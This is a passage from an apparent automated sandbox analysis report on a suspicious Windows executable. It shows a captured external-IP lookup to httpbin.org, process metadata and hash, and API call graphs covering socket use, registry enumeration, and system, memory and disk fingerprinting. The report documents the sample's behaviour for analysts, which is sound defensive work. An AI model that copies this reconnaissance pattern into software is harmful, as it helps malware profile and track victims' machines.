                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                                      Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                                      HTTPS Proxied Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.9497163.218.7.1034431688C:\Users\user\Desktop\EwhnoHx0n5.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-12-27 08:07:41 UTC52OUTGET /ip HTTP/1.1
                                                      Host: httpbin.org
                                                      Accept: */*
                                                      2024-12-27 08:07:41 UTC224INHTTP/1.1 200 OK
                                                      Date: Fri, 27 Dec 2024 08:07:41 GMT
                                                      Content-Type: application/json
                                                      Content-Length: 31
                                                      Connection: close
                                                      Server: gunicorn/19.9.0
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Credentials: true
                                                      2024-12-27 08:07:41 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                      Data Ascii: { "origin": "8.46.123.189"}


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:03:07:35
                                                      Start date:27/12/2024
                                                      Path:C:\Users\user\Desktop\EwhnoHx0n5.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\EwhnoHx0n5.exe"
                                                      Imagebase:0x450000
                                                      File size:4'462'592 bytes
                                                      MD5 hash:4C88FF06E9F5D8AAF6B642EB809DD2FF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      Disassembly

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:3.9%
                                                        Dynamic/Decrypted Code Coverage:34.7%
                                                        Signature Coverage:13.7%
                                                        Total number of Nodes:481
                                                        Total number of Limit Nodes:50
                                                        execution_graph 80262 46d5e0 80263 46d652 WSAStartup 80262->80263 80264 46d5f0 80262->80264 80263->80264 79880 48b400 79881 48b40b 79880->79881 79882 48b425 79880->79882 79885 457770 79881->79885 79883 48b421 79886 4577b6 recv 79885->79886 79887 457790 79885->79887 79888 457799 79886->79888 79887->79886 79887->79888 79888->79883 79889 48e400 79890 48e412 79889->79890 79892 48e459 79889->79892 79893 4868b0 socket ioctlsocket connect getsockname closesocket 79890->79893 79893->79892 79894 48b3c0 79895 48b3cb 79894->79895 79896 48b3ee 79894->79896 79900 489290 79895->79900 79907 4576a0 79895->79907 79897 48b3ea 79901 4576a0 send 79900->79901 79902 4892e5 79901->79902 79903 489335 WSAIoctl 79902->79903 79904 489392 79902->79904 79903->79904 79905 489366 79903->79905 79904->79897 79905->79904 79906 489371 setsockopt 79905->79906 79906->79904 79908 4576e6 send 79907->79908 79909 4576c0 79907->79909 79910 4576c9 79908->79910 79909->79908 79909->79910 79910->79897 79911 4513c9 79913 451160 79911->79913 79915 4513a1 79913->79915 79916 7d93e0 79913->79916 79926 7d8a20 10 API calls 79913->79926 79923 7d9400 79916->79923 79925 7d93f3 79916->79925 79917 7d9688 79918 7d96c7 79917->79918 79917->79925 79927 7d9280 vfprintf 79917->79927 79928 7d9220 vfprintf 79918->79928 79921 7d96df 79921->79913 79922 7d9280 vfprintf 79922->79923 79923->79917 79923->79918 79923->79922 79924 7d9220 vfprintf 79923->79924 79923->79925 79924->79923 79925->79913 79926->79913 79927->79917 79928->79921 79929 503c00 79930 503c23 79929->79930 79932 503c0d 79929->79932 79930->79932 79933 51b180 79930->79933 79934 51b2e3 79933->79934 79935 51b19b 79933->79935 79934->79932 79935->79934 79938 51b2a9 getsockname 79935->79938 79940 51b020 closesocket 79935->79940 79941 51af30 79935->79941 79945 51b060 79935->79945 79950 51b020 79938->79950 79940->79935 79942 51af63 socket 79941->79942 79943 51af4c 79941->79943 79942->79935 79943->79942 79944 51af52 79943->79944 79944->79935 79948 51b080 79945->79948 79946 51b0b0 connect 79947 51b0bf WSAGetLastError 79946->79947 79947->79948 79949 51b0ea 79947->79949 79948->79946 79948->79947 79948->79949 79949->79935 79951 51b052 79950->79951 79952 51b029 79950->79952 79951->79935 79953 51b04b closesocket 79952->79953 79954 51b03e 79952->79954 79953->79951 79954->79935 80265 504720 80269 504728 80265->80269 80266 504733 80268 504774 80269->80266 80276 50476c 80269->80276 80277 505540 socket ioctlsocket connect getsockname closesocket 80269->80277 80271 50482e 80271->80276 80278 509270 80271->80278 80273 504860 80283 504950 80273->80283 80275 504878 80276->80275 80291 5030a0 socket ioctlsocket connect getsockname closesocket 80276->80291 80277->80271 80292 50a440 80278->80292 80280 509297 80282 5092ab 80280->80282 80322 50bbe0 socket ioctlsocket connect getsockname closesocket 80280->80322 80282->80273 80284 504966 80283->80284 80288 5049c5 80284->80288 80290 5049b9 80284->80290 80324 50b590 if_indextoname 80284->80324 80286 504a3e 80286->80288 80325 50bbe0 socket ioctlsocket connect getsockname closesocket 80286->80325 80287 504aa0 gethostname 80287->80288 80287->80290 80288->80276 80290->80287 80290->80288 80291->80268 80294 50a46b 80292->80294 80293 50a4db 80295 50aa03 RegOpenKeyExA 80293->80295 80310 50ad14 80293->80310 80294->80293 80323 50b830 if_indextoname 80294->80323 80296 50ab70 RegOpenKeyExA 80295->80296 80297 50aa27 RegQueryValueExA 80295->80297 80300 50ab90 80296->80300 80301 50ac34 RegOpenKeyExA 80296->80301 80298 50aa71 80297->80298 80299 50aacc RegQueryValueExA 80297->80299 80298->80299 80308 50aa85 RegQueryValueExA 80298->80308 80304 50ab66 RegCloseKey 80299->80304 80305 50ab0e 80299->80305 80300->80301 80302 50ac54 80301->80302 80303 50acf8 RegOpenKeyExA 80301->80303 80302->80303 80306 50ad56 RegEnumKeyExA 80303->80306 80303->80310 80304->80296 80305->80304 80309 50ab1e RegQueryValueExA 80305->80309 80307 50ad9b 80306->80307 80306->80310 80311 50ae16 RegOpenKeyExA 80307->80311 80312 50aab3 80308->80312 80315 50ab4c 80309->80315 80310->80280 80313 50ae34 RegQueryValueExA 80311->80313 80314 50addf RegEnumKeyExA 80311->80314 80312->80299 80316 50af43 RegQueryValueExA 80313->80316 80321 50adaa 80313->80321 80314->80310 80314->80311 80315->80304 80317 50b052 RegQueryValueExA 80316->80317 80316->80321 80318 50adc7 RegCloseKey 80317->80318 80317->80321 80318->80314 80320 50afa0 RegQueryValueExA 80320->80321 80321->80316 80321->80317 80321->80318 80321->80320 80322->80282 80323->80293 80324->80286 80325->80290 79955 51a080 79958 519740 79955->79958 79957 51a09b 79959 519780 79958->79959 79963 51975d 79958->79963 79960 519925 RegOpenKeyExA 79959->79960 79959->79963 79961 51995a RegQueryValueExA 79960->79961 79960->79963 79962 519986 RegCloseKey 79961->79962 79962->79963 79963->79957 79964 452f17 79971 452f2c 79964->79971 79965 4531d3 79966 452fb3 RegOpenKeyExA 79966->79971 79967 45315c RegEnumKeyExA 79967->79971 79968 453046 RegOpenKeyExA 79969 453089 RegQueryValueExA 79968->79969 79968->79971 79970 45313b RegCloseKey 79969->79970 79969->79971 79970->79971 79971->79965 79971->79966 79971->79967 79971->79968 79971->79970 79972 4531d7 79975 4531f4 79972->79975 79973 453200 79974 4532dc CloseHandle 79974->79973 79975->79973 79975->79974 79976 488b50 79977 488b6b 79976->79977 79995 488bb5 79976->79995 79978 488b8f 79977->79978 79979 488bf3 79977->79979 79977->79995 80015 466e40 select 79978->80015 79996 48a550 79979->79996 79982 488bfc 79984 488c1f connect 79982->79984 79985 488c35 79982->79985 79992 488cb2 79982->79992 79982->79995 79983 488cd9 SleepEx 79988 488d14 79983->79988 79984->79985 80011 48a150 79985->80011 79986 48a150 getsockname 79991 488dff 79986->79991 79989 488d43 79988->79989 79988->79992 79993 48a150 getsockname 79989->79993 79991->79995 80016 4578b0 closesocket 79991->80016 79992->79986 79992->79991 79992->79995 79993->79995 79994 488ba1 79994->79983 79994->79992 79994->79995 79997 48a575 79996->79997 80000 48a597 79997->80000 80018 4575e0 79997->80018 79999 4578b0 closesocket 80002 48a713 79999->80002 80001 48a811 setsockopt 80000->80001 80007 48a83b 80000->80007 80009 48a69b 80000->80009 80001->80007 80002->79982 80004 48af56 80005 48af5d 80004->80005 80004->80009 80005->80002 80006 48a150 getsockname 80005->80006 80006->80002 80007->80009 80010 48abe1 80007->80010 80024 486be0 8 API calls 80007->80024 80009->79999 80009->80002 80010->80009 80023 4b67e0 ioctlsocket 80010->80023 80012 48a15f 80011->80012 80014 48a1d0 80011->80014 80013 48a181 getsockname 80012->80013 80012->80014 80013->80014 80014->79994 80015->79994 80017 4578c5 80016->80017 80017->79995 80019 457607 socket 80018->80019 80020 4575ef 80018->80020 80021 45762b 80019->80021 80020->80019 80022 457643 80020->80022 80021->80000 80022->80000 80023->80004 80024->80010 80025 45255d 80069 7d9f70 80025->80069 80028 452589 80029 4525a0 GlobalMemoryStatusEx 80028->80029 80030 4525ec 80029->80030 80071 71b002e 80030->80071 80078 71b016d 80030->80078 80085 71b03b2 80030->80085 80090 71b032a 80030->80090 80095 71b003f 80030->80095 80102 71b00bc 80030->80102 80109 71b0284 80030->80109 80114 71b01b8 80030->80114 80119 71b0407 80030->80119 80124 71b0385 80030->80124 80129 71b0143 80030->80129 80136 71b0000 80030->80136 80143 71b044e 80030->80143 80146 71b0303 80030->80146 80151 71b034a 80030->80151 80156 71b0109 80030->80156 80163 71b0250 80030->80163 80168 71b000b 80030->80168 80175 71b0213 80030->80175 80180 71b0193 80030->80180 80185 71b029e 80030->80185 80190 71b011d 80030->80190 80197 71b0359 80030->80197 80202 71b019f 80030->80202 80209 71b0267 80030->80209 80214 71b0225 80030->80214 80219 71b0423 80030->80219 80224 71b006c 80030->80224 80231 71b012c 80030->80231 80070 45256c GetSystemInfo 80069->80070 80070->80028 80072 71b0034 80071->80072 80073 71b0193 2 API calls 80072->80073 80074 71b0189 80073->80074 80075 71b044e GetLogicalDrives 80074->80075 80076 71b0443 GetLogicalDrives 80075->80076 80077 71b046b 80076->80077 80079 71b011a 80078->80079 80080 71b0193 2 API calls 80079->80080 80081 71b0189 80080->80081 80082 71b044e GetLogicalDrives 80081->80082 80083 71b0443 GetLogicalDrives 80082->80083 80084 71b046b 80083->80084 80086 71b03be 80085->80086 80087 71b044e GetLogicalDrives 80086->80087 80088 71b0443 GetLogicalDrives 80087->80088 80089 71b046b 80088->80089 80091 71b0316 80090->80091 80092 71b044e GetLogicalDrives 80091->80092 80093 71b0443 GetLogicalDrives 80092->80093 80094 71b046b 80093->80094 80096 71b0044 80095->80096 80097 71b0193 2 API calls 80096->80097 80098 71b0189 80097->80098 80099 71b044e GetLogicalDrives 80098->80099 80100 71b0443 GetLogicalDrives 80099->80100 80101 71b046b 80100->80101 80103 71b00a3 80102->80103 80104 71b0193 2 API calls 80103->80104 80105 71b0189 80104->80105 80106 71b044e GetLogicalDrives 80105->80106 80107 71b0443 GetLogicalDrives 80106->80107 80108 71b046b 80107->80108 80110 71b0235 80109->80110 80111 71b044e GetLogicalDrives 80110->80111 80112 71b0443 GetLogicalDrives 80111->80112 80113 71b046b 80112->80113 80115 71b01bb 80114->80115 80116 71b044e GetLogicalDrives 80115->80116 80117 71b0443 GetLogicalDrives 80116->80117 80118 71b046b 80117->80118 80120 71b040c 80119->80120 80121 71b044e GetLogicalDrives 80120->80121 80122 71b0443 GetLogicalDrives 80121->80122 80123 71b046b 80122->80123 80125 71b03a9 80124->80125 80126 71b044e GetLogicalDrives 80125->80126 80127 71b0443 GetLogicalDrives 80126->80127 80128 71b046b 80127->80128 80130 71b014a 80129->80130 80131 71b0193 2 API calls 80130->80131 80132 71b0189 80131->80132 80133 71b044e GetLogicalDrives 80132->80133 80134 71b0443 GetLogicalDrives 80133->80134 80135 71b046b 80134->80135 80137 71b0014 80136->80137 80138 71b0193 2 API calls 80137->80138 80139 71b0189 80138->80139 80140 71b044e GetLogicalDrives 80139->80140 80141 71b0443 GetLogicalDrives 80140->80141 80142 71b046b 80141->80142 80144 71b0451 GetLogicalDrives 80143->80144 80145 71b046b 80144->80145 80147 71b0316 80146->80147 80148 71b044e GetLogicalDrives 80147->80148 80149 71b0443 GetLogicalDrives 80148->80149 80150 71b046b 80149->80150 80152 71b034e 80151->80152 80153 71b044e GetLogicalDrives 80152->80153 80154 71b0443 GetLogicalDrives 80153->80154 80155 71b046b 80154->80155 80157 71b0125 80156->80157 80158 71b0193 2 API calls 80157->80158 80159 71b0189 80158->80159 80160 71b044e GetLogicalDrives 80159->80160 80161 71b0443 GetLogicalDrives 80160->80161 80162 71b046b 80161->80162 80164 71b025e 80163->80164 80165 71b044e GetLogicalDrives 80164->80165 80166 71b0443 GetLogicalDrives 80165->80166 80167 71b046b 80166->80167 80169 71b0014 80168->80169 80170 71b0193 2 API calls 80169->80170 80171 71b0189 80170->80171 80172 71b044e GetLogicalDrives 80171->80172 80173 71b0443 GetLogicalDrives 80172->80173 80174 71b046b 80173->80174 80176 71b021e 80175->80176 80177 71b044e GetLogicalDrives 80176->80177 80178 71b0443 GetLogicalDrives 80177->80178 80179 71b046b 80178->80179 80181 71b01aa 80180->80181 80182 71b044e GetLogicalDrives 80181->80182 80183 71b0443 GetLogicalDrives 80182->80183 80184 71b046b 80183->80184 80186 71b02a9 80185->80186 80187 71b044e GetLogicalDrives 80186->80187 80188 71b0443 GetLogicalDrives 80187->80188 80189 71b046b 80188->80189 80191 71b0125 80190->80191 80192 71b0193 2 API calls 80191->80192 80193 71b0189 80192->80193 80194 71b044e GetLogicalDrives 80193->80194 80195 71b0443 GetLogicalDrives 80194->80195 80196 71b046b 80195->80196 80198 71b0362 80197->80198 80199 71b044e GetLogicalDrives 80198->80199 80200 71b0443 GetLogicalDrives 80199->80200 80201 71b046b 80200->80201 80203 71b0165 80202->80203 80204 71b0189 80203->80204 80205 71b0193 2 API calls 80203->80205 80206 71b044e GetLogicalDrives 80204->80206 80205->80204 80207 71b0443 GetLogicalDrives 80206->80207 80208 71b046b 80207->80208 80210 71b0275 80209->80210 80211 71b044e GetLogicalDrives 80210->80211 80212 71b0443 GetLogicalDrives 80211->80212 80213 71b046b 80212->80213 80215 71b0240 80214->80215 80216 71b044e GetLogicalDrives 80215->80216 80217 71b0443 GetLogicalDrives 80216->80217 80218 71b046b 80217->80218 80220 71b03e4 80219->80220 80221 71b044e GetLogicalDrives 80220->80221 80222 71b0443 GetLogicalDrives 80221->80222 80223 71b046b 80222->80223 80225 71b0032 80224->80225 80226 71b0193 2 API calls 80225->80226 80227 71b0189 80226->80227 80228 71b044e GetLogicalDrives 80227->80228 80229 71b0443 GetLogicalDrives 80228->80229 80230 71b046b 80229->80230 80232 71b0138 80231->80232 80233 71b0193 2 API calls 80232->80233 80234 71b0189 80233->80234 80235 71b044e GetLogicalDrives 80234->80235 80236 71b0443 GetLogicalDrives 80235->80236 80237 71b046b 80236->80237 80326 4895b0 80327 4895c8 80326->80327 80328 4895fd 80326->80328 80327->80328 80329 48a150 getsockname 80327->80329 80329->80328 80330 486ab0 80331 486ad5 80330->80331 80332 486bb4 80331->80332 80333 466fa0 select 80331->80333 80334 505ed0 7 API calls 80332->80334 80336 486b54 80333->80336 80335 486ba9 80334->80335 80336->80332 80336->80335 80337 486b5d 80336->80337 80337->80335 80339 505ed0 80337->80339 80342 505a50 80339->80342 80341 505ee5 80341->80337 80343 505a58 80342->80343 80350 505ea0 80342->80350 80344 505b50 80343->80344 80345 505b88 80343->80345 80356 505a99 80343->80356 80344->80345 80348 505eb4 80344->80348 80349 505b7a 80344->80349 80359 505cae 80345->80359 80373 505ef0 socket ioctlsocket connect getsockname 80345->80373 80346 505e96 80375 519480 socket ioctlsocket connect getsockname closesocket 80346->80375 80376 506f10 socket ioctlsocket connect getsockname closesocket 80348->80376 80365 5070a0 80349->80365 80350->80341 80353 505ec2 80353->80353 80356->80345 80357 5070a0 6 API calls 80356->80357 80372 506f10 socket ioctlsocket connect getsockname closesocket 80356->80372 80357->80356 80359->80346 80361 51a920 80359->80361 80374 519320 socket ioctlsocket connect getsockname closesocket 80359->80374 80362 51a944 80361->80362 80363 51a94b 80362->80363 80364 51a977 send 80362->80364 80363->80359 80364->80359 80370 5070ae 80365->80370 80367 5071a7 80367->80345 80368 50717f 80368->80367 80382 519320 socket ioctlsocket connect getsockname closesocket 80368->80382 80370->80367 80370->80368 80377 51a8c0 80370->80377 80381 5071c0 socket ioctlsocket connect getsockname 80370->80381 80372->80356 80373->80345 80374->80359 80375->80350 80376->80353 80378 51a903 recvfrom 80377->80378 80379 51a8e6 80377->80379 80380 51a8ed 80378->80380 80379->80378 80379->80380 80380->80370 80381->80370 80382->80367 80383 4529ff FindFirstFileA 80384 452a31 80383->80384 80385 452a5c RegOpenKeyExA 80384->80385 80386 452a93 80385->80386 80387 452ade CharUpperA 80386->80387 80388 452b0a 80387->80388 80389 452bf9 QueryFullProcessImageNameA 80388->80389 80390 452c3b CloseHandle 80389->80390 80392 452c64 80390->80392 80391 452df1 CloseHandle 80393 452e23 80391->80393 80392->80391 80238 453d5e 80243 453d30 80238->80243 80239 453d90 80247 45fcb0 6 API calls 80239->80247 80242 453dc1 80243->80238 80243->80239 80244 460ab0 80243->80244 80248 4605b0 80244->80248 80246 460acd 80246->80243 80247->80242 80252 4605bd 80248->80252 80255 4607c7 80248->80255 80249 460707 WSAEventSelect 80249->80252 80249->80255 80250 4607ef 80254 460847 80250->80254 80250->80255 80258 466fa0 80250->80258 80252->80249 80252->80250 80253 4576a0 send 80252->80253 80252->80255 80253->80252 80254->80255 80256 4609e8 WSAEnumNetworkEvents 80254->80256 80257 4609d0 WSAEventSelect 80254->80257 80255->80246 80256->80254 80256->80257 80257->80254 80257->80256 80259 466fd4 80258->80259 80261 466feb 80258->80261 80260 467207 select 80259->80260 80259->80261 80260->80261 80261->80254 80394 8d7830 80396 8d785a 80394->80396 80395 8d7866 80396->80395 80399 7e12c0 80396->80399 80398 8d789a 80400 7e12cc 80399->80400 80403 7de050 80400->80403 80402 7e12fa 80402->80398 80418 7de09d 80403->80418 80423 7de503 80403->80423 80404 7ddf60 fgetc 80404->80423 80405 7ddf60 fgetc 80405->80418 80406 7dfee7 80447 7ddff0 ungetc 80406->80447 80407 7de18e 80410 7ded90 ungetc 80407->80410 80431 7de1a6 80407->80431 80410->80431 80411 7e0250 ungetc 80411->80423 80412 7de243 80412->80431 80434 7de26f 80412->80434 80440 7ddf60 fgetc 80412->80440 80413 7deb52 80415 7de81a 80413->80415 80416 7deb63 80413->80416 80414 7e11a4 ungetc 80414->80423 80426 7de850 80415->80426 80437 7deb7a 80415->80437 80417 7df0d5 80416->80417 80416->80437 80445 7ddf60 fgetc 80417->80445 80418->80405 80418->80407 80418->80412 80418->80423 80430 7de388 80418->80430 80418->80431 80422 7e0742 ungetc 80422->80431 80423->80404 80423->80406 80423->80411 80423->80414 80425 7e08d7 ungetc 80423->80425 80423->80431 80423->80434 80436 7e0006 ungetc 80423->80436 80438 7e0e3e ungetc 80423->80438 80448 7ddff0 ungetc 80423->80448 80424 7de6b9 80424->80423 80435 7de6e4 80424->80435 80424->80437 80425->80423 80426->80431 80442 7ddf60 fgetc 80426->80442 80430->80413 80430->80423 80430->80424 80430->80431 80439 7e00b8 ungetc 80430->80439 80444 7ddf60 fgetc 80430->80444 80431->80402 80432 7df0e8 80432->80423 80432->80431 80446 7ddf60 fgetc 80432->80446 80434->80422 80434->80431 80435->80431 80441 7ddf60 fgetc 80435->80441 80436->80423 80437->80423 80437->80431 80443 7ddf60 fgetc 80437->80443 80438->80423 80439->80430 80440->80412 80441->80423 80442->80423 80443->80423 80444->80430 80445->80432 80446->80432 80447->80431 80448->80423 80449 461139 80450 461148 80449->80450 80452 461527 80450->80452 80455 460f69 80450->80455 80457 45fec0 6 API calls 80450->80457 80452->80455 80458 4622d0 6 API calls 80452->80458 80454 460f00 80455->80454 80459 48d4d0 socket ioctlsocket connect getsockname closesocket 80455->80459 80457->80452 80458->80455 80459->80454

                                                        Executed Functions

                                                        Function 0048F100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                        • API String ID: 0-1590685507
                                                        • Opcode ID: e5a7b5247265b94dbe9179faa806585c399acb0d7b36150a7469039cf7b615f9
                                                        • Instruction ID: 2b2651ed9aca515b0c9656d09b36761b09a1cac0f78f4f7f49aedd159c70611b
                                                        • Opcode Fuzzy Hash: e5a7b5247265b94dbe9179faa806585c399acb0d7b36150a7469039cf7b615f9
                                                        • Instruction Fuzzy Hash: D1C2A031A043449FD714DF29C444B6BBBE1BF84318F088A6EEC989B352D775E989CB85
                                                        Function 0045255D Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 282fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 862 45255d-452614 call 7d9f70 GetSystemInfo call 8d9af0 call 8d9ce0 GlobalMemoryStatusEx call 8d9af0 call 8d9ce0 944 452619 call 71b0359 862->944 945 452619 call 71b019f 862->945 946 452619 call 71b029e 862->946 947 452619 call 71b011d 862->947 948 452619 call 71b0213 862->948 949 452619 call 71b0193 862->949 950 452619 call 71b0250 862->950 951 452619 call 71b000b 862->951 952 452619 call 71b034a 862->952 953 452619 call 71b0109 862->953 954 452619 call 71b044e 862->954 955 452619 call 71b0303 862->955 956 452619 call 71b0143 862->956 957 452619 call 71b0000 862->957 958 452619 call 71b0407 862->958 959 452619 call 71b0385 862->959 960 452619 call 71b0284 862->960 961 452619 call 71b01b8 862->961 962 452619 call 71b003f 862->962 963 452619 call 71b00bc 862->963 964 452619 call 71b03b2 862->964 965 452619 call 71b032a 862->965 966 452619 call 71b002e 862->966 967 452619 call 71b016d 862->967 968 452619 call 71b012c 862->968 969 452619 call 71b006c 862->969 970 452619 call 71b0423 862->970 971 452619 call 71b0267 862->971 972 452619 call 71b0225 862->972 873 45261b-452620 874 452626-452637 call 8d98f0 873->874 875 45277c-452904 call 8d9af0 call 8d9ce0 KiUserCallbackDispatcher call 8d9af0 call 8d9ce0 call 8d9af0 call 8d9ce0 call 7d8e38 call 7d8be0 call 7d8bd0 FindFirstFileW 873->875 880 452754-45275c 874->880 922 452906-452926 FindNextFileW 875->922 923 452928-45292c 875->923 882 452762-452777 call 8d9ce0 880->882 883 45263c-45264f GetDriveTypeA 880->883 882->875 886 452655-452685 GetDiskFreeSpaceExA 883->886 887 452743-452751 call 7d8b98 883->887 886->887 889 45268b-45273e call 8d9bc0 call 8d9c50 call 8d9ce0 call 8d99e0 call 8d9ce0 call 8d99e0 call 8d9ce0 call 8d8050 886->889 887->880 889->887 922->922 922->923 924 452932-45296f call 8d9af0 call 8d9ce0 call 7d8e78 923->924 925 45292e 923->925 931 452974-452979 924->931 925->924 932 4529a9-4529fe call 7da2b0 call 8d9af0 call 8d9ce0 931->932 933 45297b-4529a4 call 8d9af0 call 8d9ce0 931->933 933->932 944->873 945->873 946->873 947->873 948->873 949->873 950->873 951->873 952->873 953->873 954->873 955->873 956->873 957->873 958->873 959->873 960->873 961->873 962->873 963->873 964->873 965->873 966->873 967->873 968->873 969->873 970->873 971->873 972->873
                                                        APIs
                                                        • GetSystemInfo.KERNELBASE ref: 00452579
                                                        • GlobalMemoryStatusEx.KERNELBASE ref: 004525CC
                                                        • GetDriveTypeA.KERNELBASE ref: 00452647
                                                        • GetDiskFreeSpaceExA.KERNELBASE ref: 0045267E
                                                        • KiUserCallbackDispatcher.NTDLL ref: 004527E2
                                                        • FindFirstFileW.KERNELBASE ref: 004528F8
                                                        • FindNextFileW.KERNELBASE ref: 0045291F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                                        • String ID: ;%E$@$`
